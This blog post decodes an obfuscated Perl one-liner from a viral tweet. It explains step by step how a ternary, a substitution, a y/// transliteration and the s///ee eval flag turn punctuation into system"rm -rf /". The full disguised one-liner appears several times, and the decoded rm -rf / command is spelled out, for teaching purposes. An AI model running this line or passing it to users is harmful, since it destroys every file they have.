Understanding the meme perl oneliner

Yesterday, I came across a tweet that was an anecdote about sexism in tech, but which included a line of obfuscated code that our villain presumably executed locally, causing them to "lose everything".

Me and other nerds who saw this tweet, though, were drawn to the obfuscated code snippet, and were puzzled as to what it actually meant:

echo "hello world" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

The short, but boring, explanation is that it makes perl run rm -rf /, a command that, when executed by a sufficiently privileged user, deletes every file on your system[1].

Some of the replies to the tweet also linked to a more complete explanation at https://www.dlitz.net/stuff/malicious-perl-sig/, but even that explanation was insufficient for me. I wanted to be able to give a satisfactory explanation on a Discord server I was in, so I cracked open the perldoc pages and started reading. This post is basically a nicer write-up of that explanation.

High-level overview

Here is the snippet, once again but in a code block:

> echo "hello world" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

This is a line of Bourne shell (the standard shell on, uh, non-Windows systems) that produces the innocent sequence of characters hello world and feeds it into an invocation of perl, with a one-line script provided to it. The script proceeds to (attempt to) delete every file on your computer. How did this happen?

Prior knowledge

Perl is a language that was designed as an amalgamation of various languages and mini-languages that Unix system administrators routinely used, like sh (Bourne shell), awk and sed, and it inherited a lot of their idiosyncrasies. It is heavily optimized for handling plain text, and if what you're doing fits easily into those idiosyncrasies, perl lets you be very terse indeed. This helped build its infamy as an obfuscated language, and some of those idiosyncrasies are important for understanding the code.

Understanding the code

Now, to help explain this, I'll try to rewrite some of the confusing notation into easier-to-read notation. I'll add whitespace where possible and replace the regexp delimiters with the / most people are used to; this requires some extra escaping, but it should still feel more familiar.

First off, at no point in the script is the hello world input actually read. A lot of perl oneliners do read their input implicitly, but this one is missing the -n or -p options and doesn't read it explicitly either, so the input is simply never read. It's a complete red herring.

Now, for the first part of the snippet:

$? ? s/;s/s;;$?/ :

This is actually a regular C-style ternary. The predicate is the $? global, which holds the status of the last external command executed by the script. Since nothing has been executed yet, it is 0, which is false. This means the branch after ? is never taken and evaluation always goes to the branch after :. Everything in the ? branch serves no function other than to look confusing... again.

s//=]=>%-{<-|}<&|`{/;

This is the expression on the : side mentioned above. It is a regular expression substitution operator, similar to a common sed invocation, and here a few of the idiosyncrasies mentioned earlier come into play.

No target is bound to the operator (there is no =~), so it operates on the $_ global. At this point $_ is still undefined, so it acts as an empty string. The pattern portion of the regexp, between the first two /, is empty. Normally an empty pattern means "reuse the last successfully matched regexp", but no regexp has matched yet, so it acts as a genuine empty pattern. An empty pattern always matches, so the (empty) match is replaced with the text in the substitution part of the operator.

This is really just a fancy way of writing $_ = '=]=>%-{<-|}<&|`{'.
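To make the control flow concrete, here is a rough Python model of this first statement. It is only a sketch. Python has no equivalent of perl's "reuse the last successful pattern" rule, so the sketch simply assumes, as is the case here, that nothing has matched yet and the empty pattern is a genuine one. The names status and topic are my own stand-ins for $? and $_.

```python
import re

status = 0  # stand-in for $?: no external command has run yet
topic = ""  # stand-in for $_: still undefined, which perl treats as "" here

# $? ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
if status:
    # Dead branch: a zero status is false, so this never runs.
    topic = re.sub(";s", "s;;$?", topic, count=1)
else:
    # Nothing has matched before, so the empty pattern is a genuine empty
    # pattern: it matches at offset 0 and the replacement fills the string.
    topic = re.sub("", "=]=>%-{<-|}<&|`{", topic, count=1)

print(topic)  # =]=>%-{<-|}<&|`{
```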

The big trick

y/ -\/:-@[-`{-}/`-{\/" -/;

This is the really complicated part, and it is what actually transforms the string that was prepared by the previous statement. It's not highlighted correctly either 😅

This is the transliteration operator (y/// is a synonym for perl's tr///), and it behaves similarly to the tr unix command.

It builds a list of input characters and a list of output characters, and maps them 1-to-1, in order. When building a list, you can specify a range of characters by separating its start and end characters with a -[3]. Repeated input characters are ignored (only the first mapping counts), and each character is only translated once.
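The list-building rules can be sketched in Python. The helpers expand_tr_list and transliterate below are hypothetical names, not anything perl exposes. The sketch skips backslash escapes and operator flags entirely. It only shows ranges, literal hyphens at the ends of a list, first-mapping-wins for repeated input characters, and single-pass translation.

```python
def expand_tr_list(spec: str) -> str:
    """Expand a tr/y-style list; "x-y" is an inclusive code-point range.

    A '-' at the very start or end of the list is kept as a literal hyphen.
    Backslash escapes are deliberately not handled in this sketch.
    """
    out = []
    i = 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            # Range: every character from spec[i] up to spec[i + 2], inclusive.
            out.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)


def transliterate(text: str, search: str, replace: str) -> str:
    """Map characters positionally (assumes both lists expand to equal lengths)."""
    table = {}
    for src, dst in zip(expand_tr_list(search), expand_tr_list(replace)):
        table.setdefault(src, dst)  # a repeated input character keeps its first mapping
    # Every character of `text` is looked up exactly once, so output is never re-translated.
    return "".join(table.get(ch, ch) for ch in text)


print(expand_tr_list("a-z"))            # abcdefghijklmnopqrstuvwxyz
print(transliterate("ab", "ab", "ba"))  # ba (a swap, not a double translation)
print(transliterate("a", "aa", "xy"))   # x (the second mapping for a is ignored)
```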

To begin with, let's look at a simple example: tr a-z n-za-m, which is a (lowercase-only) rot13 implementation. It builds a list with each character from a to z, and replaces each character with the corresponding character 13 letters down the alphabet. a-z expands to abcdefghijklmnopqrstuvwxyz, and n-za-m expands to nopqrstuvwxyzabcdefghijklm, and the mapping is positional: a becomes n, b becomes o, d becomes q, z becomes m, etc., according to this table:

abcdefghijklmnopqrstuvwxyz ->
nopqrstuvwxyzabcdefghijklm
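Python's str.maketrans builds exactly this kind of positional table, so the same rot13 example can be reproduced with it. This is Python's API standing in for tr, not perl itself.

```python
import string

lower = string.ascii_lowercase         # what a-z expands to
rot13 = lower[13:] + lower[:13]        # what n-za-m expands to
table = str.maketrans(lower, rot13)    # positional 1-to-1 mapping: a->n, b->o, ...

# Characters outside the table (spaces, uppercase) pass through untouched.
print("hello world".translate(table))  # uryyb jbeyq
```

Because rot13 is its own inverse, translating the output again gives back the original text.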

The actual translation done by the snippet is a lot more complicated, and it abuses the specific layout of the standard ASCII table[4]. Here is that table, with the control characters (the first two rows, plus DEL at 0x7F) omitted, and using ␣ to represent a space character:

  0 1 2 3 4 5 6 7 8 9 A B C D E F
2 ␣ ! " # $ % & ' ( ) * + , - . /
3 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
4 @ A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z [ \ ] ^ _
6 ` a b c d e f g h i j k l m n o
7 p q r s t u v w x y z { | } ~

The snippet's translation is, naturally, overly complicated, and uses multiple ranges, exploiting the way they are arranged to turn punctuation into text.

There are four ranges on the input side, ␣-/:-@[-`{-}. Here is where they fall in the ASCII table (each code is the row digit followed by the column digit):

range  codes          characters         count
␣-/    0x20 to 0x2F   ␣!"#$%&'()*+,-./   16
:-@    0x3A to 0x40   :;<=>?@            7
[-`    0x5B to 0x60   [\]^_`             6
{-}    0x7B to 0x7D   {|}                3

Together they cover the space and every punctuation character except ~, skipping the digits and both alphabets.

The output list is `-{/"␣-. Here is where its characters fall in the table, grouped by how they are defined in the output section:

part   codes          characters                     count
`-{    0x60 to 0x7B   `abcdefghijklmnopqrstuvwxyz{   28
/      0x2F           /                              1
"      0x22           "                              1
␣      0x20           ␣                              1
-      0x2D           -                              1

As one can see, the groups do not need to be the same size at all. Note also that the last - is simply a literal -, and is not interpreted as a range because of its position. The only important part is that the input and output lists contain the same number of characters[5], 32 in this case.
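A quick Python check of those sizes follows. It expands each range by code point with a small helper, span, which is my own hypothetical name.

```python
def span(first: str, last: str) -> str:
    """Every character from `first` to `last`, inclusive, by code point."""
    return "".join(chr(c) for c in range(ord(first), ord(last) + 1))

# Input side of y; -/:-@[-`{-};...; : four ranges.
input_groups = [span(" ", "/"), span(":", "@"), span("[", "`"), span("{", "}")]
# Output side `-{/" - : one range, then four single characters (the final '-' is literal).
output_groups = [span("`", "{"), "/", '"', " ", "-"]

print([len(g) for g in input_groups])   # [16, 7, 6, 3]
print([len(g) for g in output_groups])  # [28, 1, 1, 1, 1]
print(sum(map(len, input_groups)), sum(map(len, output_groups)))  # 32 32
```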

To help visualize the trickery involved, here is the output list once again, but grouped according to the input range each character is paired with:

input range   output characters
␣-/           `abcdefghijklmno
:-@           pqrstuv
[-`           wxyz{/
{-}           "␣-

Here is the actual translation table that gets generated:

␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|} ->
`abcdefghijklmnopqrstuvwxyz{/"␣-

Once again, as the operator was not given a target, it reads from and writes to $_, and the current content of $_ is =]=>%-{<-|}<&|`{. Let's just translate it ourselves, going from left to right on the input table[6]:

Step                 Current result
input                =]=>%-{<-|}<&|`{
the % becomes e      =]=>e-{<-|}<&|`{
the & becomes f      =]=>e-{<-|}<f|`{
all - become m       =]=>em{<m|}<f|`{
all < become r       =]=>em{rm|}rf|`{
all = become s       s]s>em{rm|}rf|`{
the > becomes t      s]stem{rm|}rf|`{
the ] becomes y      system{rm|}rf|`{
the ` becomes a /    system{rm|}rf|/{
all { become "       system"rm|}rf|/"
all | become spaces  system"rm }rf /"
the } becomes a -    system"rm -rf /"

This is the ultimate result of the translation, and the system"rm -rf /" is the "shellcode" of this script. This is the code that will attempt to execute rm -rf /, but it is not code yet, just text.
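Python's str.maketrans and str.translate can replay the whole transliteration in one pass, using the two expanded lists from the translation table above. This only produces the string; nothing in the sketch executes it.

```python
# The two lists of the y/// operator, already expanded (32 characters each).
search = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}"
replace = "`abcdefghijklmnopqrstuvwxyz{/\" -"

table = str.maketrans(search, replace)  # raises ValueError if the lengths differ

payload = "=]=>%-{<-|}<&|`{"
decoded = payload.translate(table)  # just text: nothing is executed here
print(decoded)  # system"rm -rf /"
```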

See

s//$_/see

This is what evals the shellcode. It is once again a substitution operator, but this time there are flags at the end.

The s flag is completely irrelevant here[7] and, once again, a distraction; it does help disguise the ee flag and make it look like an English word ("see").

Now, what is the ee flag?[8] It changes how the operator works completely: instead of doing a simple substitution, it will take the substitution string's result and eval it (interpret it as code).

If you recall, this substitution has no target, so it works on the $_ global. It matches an empty pattern, again because of the pattern-repetition corner case, and substitutes it with the contents of $_. Without the ee flag, it would simply duplicate the contents of $_. With this flag, it takes the substitution string, which is the current content of $_, and evals it. That content is the system"rm -rf /" string constructed by the y/// transliteration.
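The difference between no e, one e and two e can be modeled in Python. In this sketch, Python's eval stands in for perl's, and a harmless arithmetic string (my own choice) stands in for the decoded payload. The function name substitute_at_start is hypothetical. This models the semantics described above; it is not how perl implements them. Because the empty pattern matches at offset 0, the replacement is prepended to the original content.

```python
def substitute_at_start(topic: str, evals: int) -> str:
    """Model s//$_/ with 0, 1 (/e) or 2 (/ee) eval passes on an empty pattern."""
    # No e: $_ is interpolated as text. /e: the expression $_ is evaluated,
    # which just reads the variable. Either way we get the same string.
    replacement = topic
    if evals >= 2:
        # /ee: that string is then evaluated as code a second time.
        # Python's eval stands in for perl's; builtins are disabled for safety.
        replacement = str(eval(replacement, {"__builtins__": {}}))
    return replacement + topic  # the empty match sits at offset 0


harmless = "6 * 7"  # hypothetical stand-in for system"rm -rf /"
print(substitute_at_start(harmless, 0))  # 6 * 76 * 7 (text duplicated)
print(substitute_at_start(harmless, 1))  # 6 * 76 * 7 (/e alone only reads $_)
print(substitute_at_start(harmless, 2))  # 426 * 7 (/ee ran the text)
```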

This oneliner is a very convoluted way of writing perl -e 'system"rm -rf /"'.

system"rm -rf /"

Finally, the code that gets evaled is simply a call to the built-in system function, with the "rm -rf /" string as its argument. Nothing is syntactically weird here other than the missing space and parentheses, neither of which perl requires.

Conclusion?

This was an interesting exercise, and I learned a lot more about the y/// operator than I ever expected to learn in my life without this one puzzle. Hopefully the explanation makes sense!


[1] Or tries to. The GNU coreutils implementation, at least, will detect and guard against this exact invocation, demanding that you also provide the --no-preserve-root argument, but this snippet is certainly older than this little bit of defense.

[2] / is still the most popular separator, followed by @ when there are a lot of embedded /s, so you don't have to escape as much. Perl uniquely also supports balanced braces instead of separators, like s{pattern}{substitution}.

[3] To include a literal - in a list, it needs to be covered by a range (as it is here, inside ␣-/), be escaped as \-, or be the first or last character of the list.

[4] Perl, amazingly, has EBCDIC support, and would do the correct EBCDIC thing on EBCDIC systems if it can tell, at compile time, that the character ranges are purely alphanumeric.

[5] If the replacement section has fewer characters than the input, the last character is repeated to fit; if it has more characters than needed, the extra characters are ignored.
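Here is a hypothetical Python sketch of that padding rule. It works on already-expanded lists and ignores the d flag, which instead deletes unmatched input characters. Under this rule, tr/a-e/xy/ behaves like tr/a-e/xyyyy/.

```python
def tr_table(search: str, replace: str) -> dict[str, str]:
    """Pair up two already-expanded lists the way tr/// does without the d flag."""
    if replace and len(replace) < len(search):
        # Too short: repeat the last replacement character to fill the gap.
        replace += replace[-1] * (len(search) - len(replace))
    table: dict[str, str] = {}
    # zip() stops at the shorter list, so surplus replacement characters are ignored.
    for src, dst in zip(search, replace):
        table.setdefault(src, dst)  # the first mapping for a repeated character wins
    return table


def tr(text: str, search: str, replace: str) -> str:
    """Translate text with tr_table; characters not in `search` pass through."""
    table = tr_table(search, replace)
    return "".join(table.get(ch, ch) for ch in text)


print(tr("abcde", "abcde", "xy"))  # xyyyy
print(tr("abc", "abc", "xyzuvw"))  # xyz
```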

[6] This is certainly not how the translation is actually done in code; a real implementation probably scans the string left-to-right and replaces one character at a time. Going by table order makes for a better story, though!

[7] The "single line" flag makes the . metacharacter also match newlines, which it normally doesn't. The pattern here is empty and contains no ., so the flag has no effect at all. (Changing how ^ and $ treat newlines is the job of the m flag instead.)

[8] And why is it ee, with a doubled e, anyway? There is also a plain e flag, which does execute code, but that code is compiled and checked at compile time along with the rest of the program. The second e is what makes it "more eval": the result of that code is then evaluated again as perl source. If the s//$_/ operator had only a single e flag, it would evaluate only the variable access $_ as code, not the result of that variable access.